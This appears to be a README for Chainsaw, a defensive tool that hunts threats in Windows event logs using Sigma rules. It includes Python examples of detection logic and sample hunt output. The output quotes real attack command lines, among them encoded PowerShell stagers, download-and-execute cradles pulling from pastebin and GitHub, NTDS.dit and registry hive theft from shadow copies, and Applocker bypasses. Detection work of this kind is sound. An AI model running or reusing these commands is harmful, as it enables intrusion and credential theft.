Chainsaw provides a powerful "first-response" capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and identifies threats using built-in detection logic and via support for Sigma detection rules.
- Search and extract event log records by event IDs, string matching, and regex patterns
- Hunt for threats using Sigma detection rules and custom built-in detection logic
- Lightning fast, written in Rust, wrapping the EVTX parser library by @OBenamram
- Document tagging (detection logic matching) provided by the TAU Engine library
- Output in ASCII table, CSV, or JSON format
Using the --rules and --mapping parameters you can specify a directory containing a subset of Sigma detection rules (or just the entire Sigma git repo), and Chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells Chainsaw which event IDs to run the detection rules against and which fields are relevant. By default the following event IDs are supported:
| Event Type | Event ID |
|---|---|
| Process Creation (Sysmon) | 1 |
| Network Connections (Sysmon) | 3 |
| Image Loads (Sysmon) | 7 |
| File Creation (Sysmon) | 11 |
| Registry Events (Sysmon) | 13 |
| PowerShell Script Blocks | 4104 |
| Process Creation | 4688 |
| Scheduled Task Creation | 4698 |
| Service Creation | 7045 |
Chainsaw also ships with built-in detection logic (disable it with --no-builtin) that covers:
- Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
- Detection of key event logs being cleared, or the event log service being stopped
- Users being created or added to sensitive user groups
- Brute-force of local user accounts
- RDP logins
You can pass the --lateral-all flag to chainsaw to also parse and extract additional 4624 logon types (network, service, batch, etc.) relating to potential lateral movement that may be of interest during investigations.
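The built-in checks and the --lateral-all behaviour described above, as an added Python example that is not Chainsaw's own code: it applies the same kind of logic to a handful of constructed Security and System log records. The event IDs are the standard Windows ones (1102 Security audit log cleared, 104 a log cleared as recorded in the System log, 1100 event logging service shut down, 4720 user created, 4728/4732/4756 member added to a security group, 4625 failed logon, 4624 logon with LogonType 10 for RDP). The record layout, the sample data and the 5-failures-in-5-minutes brute-force threshold are assumptions of this example, not Chainsaw's.

```python
"""Added example, not Chainsaw's own code: built-in style detections run over
constructed log records. Event IDs are the standard Windows ones; the record
layout, the sample data and the brute-force threshold are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

SENSITIVE_GROUP_EVENTS = {4728, 4732, 4756}  # member added to a global/local/universal security group
LATERAL_LOGON_TYPES = {"3", "4", "5"}         # network, batch, service: the --lateral-all extras
BRUTE_FORCE_THRESHOLD = 5                     # assumed: 5 failed logons for one account ...
BRUTE_FORCE_WINDOW = timedelta(minutes=5)     # ... within 5 minutes


def rec(time, log, eid, computer, **data):
    """Constructed record holding the Event.System / Event.EventData fields used below."""
    return {"time": datetime.fromisoformat(time), "log": log, "id": eid,
            "computer": computer, "data": data}


SAMPLE_EVENTS = [  # constructed sample data
    rec("2021-06-28T20:40:00", "Security", 1102, "DC01", SubjectUserName="a-jbrown"),
    rec("2021-06-28T20:40:05", "System", 104, "DC01", Channel="Microsoft-Windows-Sysmon/Operational"),
    rec("2021-06-28T20:40:10", "Security", 1100, "DC01"),
    rec("2021-06-28T20:41:00", "Security", 4720, "DC01", TargetUserName="svc_helpdesk2", SubjectUserName="a-jbrown"),
    rec("2021-06-28T20:41:10", "Security", 4728, "DC01", MemberName="CN=svc_helpdesk2,OU=Users,DC=example,DC=corp",
        TargetUserName="Domain Admins", SubjectUserName="a-jbrown"),
    # five failed logons for one account inside two minutes
    *[rec(f"2021-06-28T20:42:{s:02d}", "Security", 4625, "WS01", TargetUserName="bob", IpAddress="10.0.0.9")
      for s in (0, 10, 20, 30, 40)],
    rec("2021-06-28T20:43:00", "Security", 4624, "WS01", TargetUserName="bob", LogonType="10", IpAddress="10.0.0.9"),
    rec("2021-06-28T20:43:30", "Security", 4624, "WS01", TargetUserName="bob", LogonType="3", IpAddress="10.0.0.9"),
    rec("2021-06-28T20:43:40", "Security", 4624, "WS01", TargetUserName="WS01$", LogonType="5", IpAddress="-"),
    rec("2021-06-28T20:43:50", "Security", 4624, "WS01", TargetUserName="alice", LogonType="2", IpAddress="-"),
]


def hunt(events, lateral_all=False):
    """Return {detection name: [records]}; names mirror the CSV files chainsaw writes."""
    hits = defaultdict(list)
    failures = defaultdict(list)     # (computer, account) -> timestamps of recent 4625s
    flagged = set()
    for ev in sorted(events, key=lambda e: e["time"]):
        eid, data = ev["id"], ev["data"]
        if eid == 1102 and ev["log"] == "Security":
            hits["audit_log_was_cleared"].append(ev)
        elif eid == 104 and ev["log"] == "System":
            hits["system_log_was_cleared"].append(ev)
        elif eid == 1100:
            hits["event_log_service_stopped"].append(ev)
        elif eid == 4720:
            hits["new_user_created"].append(ev)
        elif eid in SENSITIVE_GROUP_EVENTS:
            hits["user_added_to_interesting_group"].append(ev)
        elif eid == 4625:
            key = (ev["computer"], data.get("TargetUserName", "").lower())
            recent = [t for t in failures[key] if ev["time"] - t <= BRUTE_FORCE_WINDOW] + [ev["time"]]
            failures[key] = recent
            if len(recent) >= BRUTE_FORCE_THRESHOLD and key not in flagged:
                flagged.add(key)     # report each account once, when the threshold is first crossed
                hits["account_brute_forcing"].append({"computer": key[0], "account": key[1],
                                                      "attempts": len(recent),
                                                      "first": recent[0], "last": recent[-1]})
        elif eid == 4624:
            logon_type = data.get("LogonType")
            # RDP (type 10) by default; network/batch/service logons only with --lateral-all
            if logon_type == "10" or (lateral_all and logon_type in LATERAL_LOGON_TYPES):
                hits["4624_logins"].append(ev)
    return dict(hits)


if __name__ == "__main__":
    for name, rows in hunt(SAMPLE_EVENTS, lateral_all=True).items():
        print(f"[+] {name}: {len(rows)} record(s)")
```

Run stand-alone it lists one record per detection except 4624_logins, which carries three (the RDP logon plus the network and service logons that --lateral-all adds); without lateral_all only the RDP logon is reported, and the interactive type 2 logon is never reported.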
You can find pre-compiled versions of chainsaw in the releases section of this GitHub repo, or you can clone the repo (and its submodules) by running:
git clone --recurse-submodules https://github.com/countercept/chainsaw.git
You can then compile the code yourself by running:
cargo build --release
Once the build has finished, you will find a copy of the compiled binary in the target/release folder. Make sure to build with the --release flag, as this ensures significantly faster execution time.
If you want to quickly see what Chainsaw looks like when it runs, you can use the command:
./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml
When using Sigma rule detection logic, Chainsaw requires a mapping file to tell it which event IDs to check, which fields are important, and which fields to output in the table view. The Sigma mapping included in the mapping_files directory already supports most of the key event IDs; if you want to add support for additional event IDs you can use this mapping file as a template.
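What the --rules/--mapping pair does, as an added Python example (not Chainsaw's engine, and not the schema of its mapping file): two hand-written rules in Sigma's detection layout, a mapping that binds the rule fields Image and CommandLine to their paths in Sysmon event 1 and Security event 4688 records, and an evaluator that runs the rules over constructed events. The mapping layout, the record shape, the filter clause and the sample events are assumptions of this example; the two command lines in the first two sample events echo rows of the hunt output shown further down the page.

```python
"""Added example (not Chainsaw's engine or its mapping-file schema): a minimal
Sigma-style evaluator. A rule names logical fields (Image, CommandLine); the
mapping binds an event ID to where those fields live in the parsed record; the
rule's condition is then evaluated against every event whose ID is mapped."""

# Hand-written rules in Sigma's detection layout, modelled on rule titles that
# appear in chainsaw's output (not copied from the Sigma repository).
RULES = [
    {"title": "Suspicious Certutil Command",
     "detection": {
         "selection": {"Image|endswith": "\\certutil.exe",
                       "CommandLine|contains": ["-decode", "-urlcache", "-encode"]},
         "filter": {"Image|startswith": "C:\\Program Files\\"},   # assumed exclusion
         "condition": "selection and not filter"}},
    {"title": "Exfiltration and Tunneling Tools Execution",
     "detection": {
         "selection": {"Image|endswith": ["\\plink.exe", "\\socat.exe", "\\stunnel.exe"]},
         "condition": "selection"}},
]

# Assumed mapping layout: event ID -> Sigma field -> dotted path in the record.
# Sysmon 1 calls the binary Image; Security 4688 calls it NewProcessName.
MAPPING = {
    1:    {"Image": "Event.EventData.Image", "CommandLine": "Event.EventData.CommandLine"},
    4688: {"Image": "Event.EventData.NewProcessName", "CommandLine": "Event.EventData.CommandLine"},
}


def lookup(record, dotted):
    """Walk a dotted path through nested dicts; None when any step is missing."""
    for key in dotted.split("."):
        record = record.get(key) if isinstance(record, dict) else None
    return record


def value_matches(value, modifiers, pattern):
    """One Sigma string comparison; Sigma matching is case-insensitive."""
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in v
    if "startswith" in modifiers:
        return v.startswith(p)
    if "endswith" in modifiers:
        return v.endswith(p)
    return v == p


def selection_matches(selection, record, fields):
    """All field constraints must hold (AND); a list of patterns is OR, or AND
    with the |all modifier. A field the mapping does not bind for this event
    ID can never match, which is why the mapping must list every field a rule uses."""
    for spec, patterns in selection.items():
        name, *modifiers = spec.split("|")
        value = lookup(record, fields[name]) if name in fields else None
        if value is None:
            return False
        results = [value_matches(value, modifiers, p)
                   for p in (patterns if isinstance(patterns, list) else [patterns])]
        if not (all(results) if "all" in modifiers else any(results)):
            return False
    return True


def evaluate_condition(condition, truth):
    """'a and not b or c' with Sigma precedence (and before or); no parentheses or 'x of'."""
    def term(tok):
        return not truth[tok[4:]] if tok.startswith("not ") else truth[tok]
    return any(all(term(t.strip()) for t in clause.split(" and "))
               for clause in condition.split(" or "))


def hunt(events, rules=RULES, mapping=MAPPING):
    """Return {rule title: [matching records]}; events with an unmapped ID are skipped."""
    hits = {}
    for record in events:
        fields = mapping.get(lookup(record, "Event.System.EventID"))
        if fields is None:
            continue
        for rule in rules:
            det = rule["detection"]
            truth = {name: selection_matches(sel, record, fields)
                     for name, sel in det.items() if name != "condition"}
            if evaluate_condition(det["condition"], truth):
                hits.setdefault(rule["title"], []).append(record)
    return hits


def process_event(image, cmdline, computer="MSEDGEWIN10", eid=1, image_field="Image"):
    """Constructed record in the nested shape a parsed EVTX event takes."""
    return {"Event": {"System": {"EventID": eid, "Computer": computer},
                      "EventData": {image_field: image, "CommandLine": cmdline}}}


SAMPLE_EVENTS = [   # constructed; the first two echo rows of the hunt output
    process_event("C:\\Windows\\System32\\certutil.exe", "certutil -f -decode fi.b64 AllTheThings.dll"),
    process_event("C:\\Users\\user01\\Desktop\\plink.exe", "", "PC01.example.corp", 4688, "NewProcessName"),
    process_event("C:\\Windows\\System32\\certutil.exe", "certutil -verify cert.cer"),          # benign
    process_event("C:\\Program Files\\Vendor\\certutil.exe", "certutil -urlcache * delete"),      # filtered out
    {"Event": {"System": {"EventID": 4104, "Computer": "PC01.example.corp"},                   # ID not mapped
               "EventData": {"ScriptBlockText": "certutil -decode a b"}}},
]

if __name__ == "__main__":
    for title, matches in hunt(SAMPLE_EVENTS).items():
        print(f"[+] Detection: {title} ({len(matches)} event(s))")
```

The 4688 record only matches because the mapping translates the rule's Image field to NewProcessName for that event ID; drop 4688 from the mapping and the plink.exe event is never evaluated, which is the behaviour to expect from any event ID the mapping file does not list. The 4104 script block record is skipped for the same reason even though its text contains "-decode".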
Search help output:
USAGE:
chainsaw search [FLAGS] [OPTIONS] <evtx-path>
FLAGS:
-i, --case_insensitive
-h, --help Prints help information
-V, --version Prints version information
OPTIONS:
-e, --event <event-id>
-o, --output <output-file>
-r, --regex_search <search-regex>
-s, --string <search-string>
ARGS:
<evtx-path>
Search all .evtx files in the evtx_files dir for event id 4624
./chainsaw search ~/Downloads/evtx_files/ -e 4624
Search a specific evtx log for logon events containing the string "bob" (case insensitive)
./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -s "bob" -i
Search a specific evtx log for logon events, with a matching regex pattern. Save results to file
./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -r "bob[a-zA-Z]" -o out.txt
Hunt help output:
USAGE:
chainsaw hunt [FLAGS] [OPTIONS] <evtx-path>
FLAGS:
--csv
Save hunt output to individual CSV file, otherwise output in a table format
--no-builtin
Do not use inbuilt detection logic, only use the specified rules for detection
--full
Show full event output, otherwise output is truncated to improve readability
-h, --help
Prints help information
--lateral-all
List additional 4624 events potentially relating to lateral movement
-V, --version
Prints version information
OPTIONS:
--col-width <col-width>
Change the maximum column width (default 40). Use this option if the table output is un-readable [default: 40]
--json <json-output>
Save the full event log and associated detections to disk in a JSON format to the specified path
-m, --mapping <mapping-path>
Specify the mapping file to use with the specified detection rules. Required when using the --rules/-r flag
-r, --rules <rules-path>
Specify a directory containing detection rules to use. All files matching *.yml will be used
ARGS:
<evtx-path>
Specify an EVTX file, or a directory containing the EVTX files to search. If you specify a directory, all files matching *.evtx will be used.
Specifying "win_default" will use "C:\Windows\System32\winevt\Logs\"
Hunt through all event logs in a specific path, show additional information relating to potential lateral movement, and save results to individual CSV files
-> % ./chainsaw hunt evtx_attack_samples/ --lateral-all --csv
(chainsaw ASCII-art banner)
By F-Secure Countercept (Author: @FranticTyping)
[+] Found 20 EVTX files
[!] Continuing without Detection rules, no path provided
[+] Saving results to CSV files
[+] Created chainsaw_2021-06-28T20-42-25/system_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/event_log_service_stopped.csv
[+] Created chainsaw_2021-06-28T20-42-25/new_user_created.csv
[+] Created chainsaw_2021-06-28T20-42-25/4624_logins.csv
[+] Created chainsaw_2021-06-28T20-42-25/user_added_to_interesting_group.csv
[+] Created chainsaw_2021-06-28T20-42-25/audit_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/account_brute_forcing.csv
[+] 18 Detections found
Hunt through all event logs in a specific path, applying the built-in detection logic and the Sigma detection rules from the specified path
-> % ./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml
(chainsaw ASCII-art banner)
By F-Secure Countercept (Author: @FranticTyping)
[+] Found 266 EVTX files
[+] Loaded 734 detection rules (74 were not loaded)
[+] Printing results to screen
[+] Hunting: [========================================] 100%
[+] Detection: Security audit log was cleared

| system_time | id | computer | subject_user |
|---|---|---|---|
| 2019-01-20 07:00:50 | 1102 | "WIN-77LTAPHIQ1R.example.corp" | "Administrator" |
| 2019-01-20 07:29:57 | 1102 | "WIN-77LTAPHIQ1R.example.corp" | "Administrator" |
| 2019-11-15 08:19:02 | 1102 | "alice.insecurebank.local" | "bob" |
| 2020-07-22 20:29:27 | 1102 | "01566s-win16-ir.threebeesco.com" | "a-jbrown" |
| 2020-09-02 11:47:39 | 1102 | "01566s-win16-ir.threebeesco.com" | "a-jbrown" |
| 2020-09-15 18:04:36 | 1102 | "MSEDGEWIN10" | "IEUser" |
| 2020-09-15 19:28:17 | 1102 | "01566s-win16-ir.threebeesco.com" | "a-jbrown" |
| 2020-09-17 10:57:37 | 1102 | "01566s-win16-ir.threebeesco.com" | "a-jbrown" |
| 2020-09-23 16:49:41 | 1102 | "01566s-win16-ir.threebeesco.com" | "Administrator" |
[+] Detection: Suspicious Command Line

| system_time | id | detection_rules | computer_name | Event.EventData.CommandLine | process_name |
|---|---|---|---|---|---|
| 2019-02-13 18:03:28 | 4688 | Exfiltration and Tunneling Tools Execution | "PC01.example.corp" | <empty> | C:\Users\user01\Desktop\plink.exe |
[+] Detection: Suspicious Process Creation

| system_time | id | detection_rules | computer_name | Event.EventData.Image | command_line |
|---|---|---|---|---|---|
| 2019-02-16 10:02:21 | 1 | Exfiltration and Tunneling Tools Execution | "PC01.example.corp" | C:\Users\IEUser\Desktop\plink.exe | plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test |
| 2019-03-17 20:18:09 | 1 | Netsh Port or Application Allowed; Netsh RDP Port Opening | "PC04.example.corp" | C:\Windows\System32\netsh.exe | netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow |
| 2019-03-17 20:20:17 | 1 | File or Folder Permissions Modifications | "PC04.example.corp" | C:\Windows\System32\icacls.exe | "C:\Windows\System32\icacls.exe" C:\Windows\System32\termsrv.dll /grant %%username%%:F |
| 2019-03-17 20:20:17 | 1 | File or Folder Permissions Modifications | "PC04.example.corp" | C:\Windows\System32\icacls.exe | "C:\Windows\System32\icacls.exe" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) |
| 2019-04-27 18:47:00 | 1 | Execution from Suspicious Folder | "IEWIN7" | C:\Users\Public\KeeFarce.exe | KeeFarce.exe |
| 2019-04-29 20:59:21 | 1 | Non Interactive PowerShell | "IEWIN7" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile |
| 2019-04-29 20:59:22 | 1 | Local Accounts Discovery | "IEWIN7" | C:\Windows\System32\whoami.exe | "C:\Windows\system32\whoami.exe" /all |
| 2019-04-30 07:46:15 | 1 | Meterpreter or Cobalt Strike Getsystem Service Start | "IEWIN7" | C:\Windows\System32\cmd.exe | cmd.exe /c echo msdhch > \\.\pipe\msdhch |
| 2019-04-30 20:26:52 | 1 | Mimikatz Command Line; FromBase64String Command Line; Curl Start Combination | "IEWIN7" | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pg... (use --full to show all content) |
| 2019-04-30 20:26:52 | 1 | Mimikatz Command Line; FromBase64String Command Line; Non Interactive PowerShell | "IEWIN7" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0Bd... (use --full to show all content) |
| 2019-07-19 15:11:26 | 1 | Shadow Copies Creation Using Operating Systems Utilities | "MSEDGEWIN10" | C:\Windows\System32\vssadmin.exe | vssadmin.exe create shadow /for=C: |
| 2019-07-19 15:11:27 | 1 | Copying Sensitive Files with Credential Data | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" |
| 2019-07-19 15:11:27 | 1 | Copying Sensitive Files with Credential Data | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" |
| 2019-07-26 07:39:14 | 1 | HH.exe Execution | "MSEDGEWIN10" | C:\Windows\hh.exe | "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm |
| 2019-07-26 07:39:14 | 1 | HTML Help Shell Spawn; Suspicious Rundll32 Activity | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} |
| 2019-07-29 21:11:17 | 1 | Suspicious Rundll32 Activity | "MSEDGEWIN10" | C:\Windows\System32\rundll32.exe | "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", |
| 2019-07-29 21:11:17 | 1 | Suspicious Call by Ordinal | "MSEDGEWIN10" | C:\Windows\SysWOW64\rundll32.exe | "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", |
| 2019-07-29 21:32:58 | 1 | Suspicious Certutil Command | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | cmd /c certutil -f -decode fi.b64 AllTheThings.dll |
| 2019-07-29 21:32:59 | 1 | Suspicious Certutil Command | "MSEDGEWIN10" | C:\Windows\System32\certutil.exe | certutil -f -decode fi.b64 AllTheThings.dll |
| 2019-07-29 21:33:03 | 1 | Bitsadmin Download | "MSEDGEWIN10" | C:\Windows\System32\bitsadmin.exe | bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" |
| 2019-07-29 21:33:18 | 1 | Mshta JavaScript Execution; Suspicious Rundll32 Activity | "MSEDGEWIN10" | C:\Windows\System32\mshta.exe | mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); |
| 2019-07-29 21:33:23 | 1 | Encoded PowerShell Command Line; Non Interactive PowerShell | "MSEDGEWIN10" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')\|ForEach-Object{[Char]$_})))" |
| 2019-07-29 21:33:28 | 1 | Possible Applocker Bypass | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll |
| 2019-07-29 21:33:28 | 1 | Possible Applocker Bypass | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll |
| 2019-07-29 21:33:29 | 1 | Possible Applocker Bypass | "MSEDGEWIN10" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll |
| 2019-07-29 21:33:29 | 1 | Possible Applocker Bypass | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll |
| 2019-07-29 21:33:29 | 1 | Possible Applocker Bypass | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll |
| 2019-07-29 21:33:34 | 1 | Possible Applocker Bypass | "MSEDGEWIN10" | C:\Windows\System32\cmd.exe | cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll |
| 2020-12-04 22:41:04 | 1 | Suspicious Svchost Process; Windows Processes Suspicious Parent Directory | "MSEDGEWIN10" | C:\Windows\System32\svchost.exe | C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry |
| 2020-12-09 16:52:34 | 1 | Execution from Suspicious Folder | "MSEDGEWIN10" | C:\Users\Public\psexecprivesc.exe | "C:\Users\Public\psexecprivesc.exe" C:\Windows\System32\mspaint.exe |
| 2020-12-09 16:52:41 | 1 | PsExec Service Start | "MSEDGEWIN10" | C:\Windows\PSEXESVC.exe | C:\Windows\PSEXESVC.exe |
| 2021-01-26 13:21:13 | 1 | Possible Applocker Bypass | "LAPTOP-JU4M3I0E" | C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false |
| 2021-01-26 13:21:14 | 1 | Non Interactive PowerShell | "LAPTOP-JU4M3I0E" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe start-process notepad.exe |
| 2021-04-20 20:32:55 | 1 | Non Interactive PowerShell | "MSEDGEWIN10" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile |
| 2021-04-20 20:33:13 | 1 | Suspicious Svchost Process; Windows Processes Suspicious Parent Directory | "MSEDGEWIN10" | C:\Windows\System32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc |
| 2021-04-20 20:33:14 | 1 | Suspicious Svchost Process; Windows Processes Suspicious Parent Directory | "MSEDGEWIN10" | C:\Windows\System32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost |
| 2021-04-22 22:09:26 | 1 | Windows Processes Suspicious Parent Directory | "MSEDGEWIN10" | C:\Windows\System32\services.exe | C:\Windows\system32\services.exe 652 "lsass.dmp" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v |
| 2021-04-22 22:09:35 | 1 | Suspicious Svchost Process; Windows Processes Suspicious Parent Directory | "MSEDGEWIN10" | C:\Windows\System32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost |
[+] Detection: Suspicious File Creation

| system_time | id | detection_rules | computer_name | Event.EventData.TargetFilename | image |
|---|---|---|---|---|---|
| 2019-05-14 14:04:05 | 11 | ‣ Hijack Legit RDP Session to Move Laterally | "alice.insecurebank.local" | `C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe` | `C:\Windows\system32\mstsc.exe` |
| 2019-07-19 14:45:31 | 11 | ‣ Startup Folder File Write | "MSEDGEWIN10" | `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk` | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` |
| 2020-02-10 08:28:12 | 11 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Windows\System32\drivers\VBoxDrv.sys` | `c:\Users\Public\BYOV\TDL\Furutaka.exe` |
| 2020-07-03 08:47:21 | 11 | ‣ Suspicious Desktopimgdownldr Target File | "MSEDGEWIN10" | `C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z` | `C:\Windows\System32\svchost.exe` |
| 2020-10-17 11:43:33 | 11 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\IEUser\AppData\Roaming\WINWORD.exe` | `C:\Users\Public\tools\apt\wwlib\test.exe` |
| 2020-10-17 11:43:33 | 11 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\IEUser\AppData\Roaming\wwlib.dll` | `C:\Users\Public\tools\apt\wwlib\test.exe` |
| 2020-10-23 21:57:34 | 11 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968` | `c:\Users\Public\test.tmp` |
| 2020-10-23 21:57:34 | 11 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948` | `c:\Users\Public\test.tmp` |
| 2020-11-26 17:38:11 | 11 | ‣ Execution from Suspicious Folder | "LAPTOP-JU4M3I0E" | `C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll` | `C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe` |

[+] Detection: Windows Defender Detections

| system_time | id | computer | threat_name | threat_file | user |
|---|---|---|---|---|---|
